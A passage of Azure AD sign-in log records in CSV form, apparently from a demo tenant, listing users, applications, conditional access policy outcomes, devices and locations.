Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:39,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",0aa4716b-db4f-4af3-adf5-86eac5281a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,0aa4716b-db4f-4af3-adf5-86eac5281a00,SigninLogs,Sucess,33.7984581,-84.38828278
+557,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,39:35.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,ac127303-d8a7-4084-9ba8-7a40d9b2fa47,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 17:39,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",0aa4716b-db4f-4af3-adf5-86eaa02a1a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,0aa4716b-db4f-4af3-adf5-86eaa02a1a00,SigninLogs,Sucess,33.7984581,-84.38828278
+558,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,57:52.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,843010c0-1d64-477b-a254-b58793dec8b0,Microsoft.aadiam,Microsoft.aadiam,,Julian Isla,4,BE,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Block Access JulianI', 'result': 'success', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'JulianI Exchange native controls', 'result': 'success', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 16:57,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",ad09f59c-2ec1-4ebf-90ab-0f25b0111c00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Julian Isla,2935e535-8fdf-4217-865b-e084cb7214f1,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,ad09f59c-2ec1-4ebf-90ab-0f25b0111c00,SigninLogs,Sucess,50.6406517,5.572050095
+559,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,46:42.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,19b8a429-fe14-42e0-8a7b-bd1bf9ef9ffc,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 18:46,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Edge 80.0.361', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",a48528e7-db61-4f27-8758-ce2f51880100,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,a48528e7-db61-4f27-8758-ce2f51880100,SigninLogs,Sucess,32.32146072,34.85319901
+560,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:30.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e1af5996-d9bf-40cb-9943-e470151c5e20,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 19:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",e446f264-3933-463f-bc0b-d42246932200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,e446f264-3933-463f-bc0b-d42246932200,SigninLogs,Sucess,36.6404686,-78.26995087
+561,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,57:56.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d250c250-9dd0-45d0-a8d2-cd17ef72e4a8,Microsoft.aadiam,Microsoft.aadiam,,Julian Isla,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}]",notApplied,09/04/2020 16:57,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",5a121923-a43a-49e3-acac-67d991c31900,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Julian Isla,2935e535-8fdf-4217-865b-e084cb7214f1,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,5a121923-a43a-49e3-acac-67d991c31900,SigninLogs,Sucess,50.6406517,5.572050095
+562,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:31.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9bc0141f-3a74-479c-aea2-e3ace2832551,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",93d60bd4-ad49-40a5-9c6c-157dd6d11b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,93d60bd4-ad49-40a5-9c6c-157dd6d11b00,SigninLogs,Sucess,36.6404686,-78.26995087
+563,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,03:14.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8fa78b68-2835-468d-a282-47d1fd39245c,Microsoft.aadiam,Microsoft.aadiam,,Julian Isla,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:03,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",268d392c-7163-4a17-b774-5f4fbf551b00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Julian Isla,2935e535-8fdf-4217-865b-e084cb7214f1,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,268d392c-7163-4a17-b774-5f4fbf551b00,SigninLogs,Sucess,50.6406517,5.572050095
